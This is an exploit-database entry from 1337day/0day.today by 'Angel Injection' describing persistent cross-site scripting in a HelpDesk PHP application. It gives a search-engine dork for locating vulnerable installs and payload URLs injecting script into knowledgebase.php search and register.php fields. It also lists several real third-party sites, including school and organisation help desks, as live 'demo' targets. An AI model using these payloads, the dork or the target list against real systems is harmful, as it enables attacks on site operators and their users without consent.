HelpDesk (All Version) Multiple XSS Presistent Vulnerability

2012-04-29T00:00:00
ID 1337DAY-ID-18145
Type zdt
Reporter Angel Injection
Modified 2012-04-29T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day.com                                   0
1  [+] Support e-mail  : submit[at]1337day.com                         1
0                                                                      0
1               #########################################              1
0               I'm Angel Injection member from Inj3ct0r Team          1
1               #########################################              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
Exploit Title: HelpDesk(All Version)Multiple XSS Presistent Vulnerability
Author: Angel Injection
url: www.helpdesk.com
Security -::RISK: High
Dork: intext:"powered by HelpDesk"
Note: (ياالهي انصر اخواننا في البحرين)

http://server/[path]/knowledgebase.php

http://server/[path]/knowledgebase.php?act=search&searchvalue=[xss]&searchbtn=Search+knowledge+Base

http://server/[path]/knowledgebase.php?act=search&searchvalue="><script>alert(1337)</script>searchbtn=Search+knowledge+Base


http://server/[path]/register.php

http://server/[path]/register.php?act=register&client_name=[xss]=0&submit=Signup
0r
http://server/[path]/register.php [put java script]

DEMO SITES
http://helpdesk.thevoipconnection.com/helpdesk/
http://www.blendedschools.net/helpdesk/
https://helpdesk.westerlyps.org/helpdeskpilot/
http://www.thegamerslab.com/helpdesk/
http://www.ns1.oceana.org/
http://www.tecshelp.ecu.edu/
http://www.support.coderelief.com/
http://www.support.learn21.org/
and more.



#  0day.today [2016-04-20]  #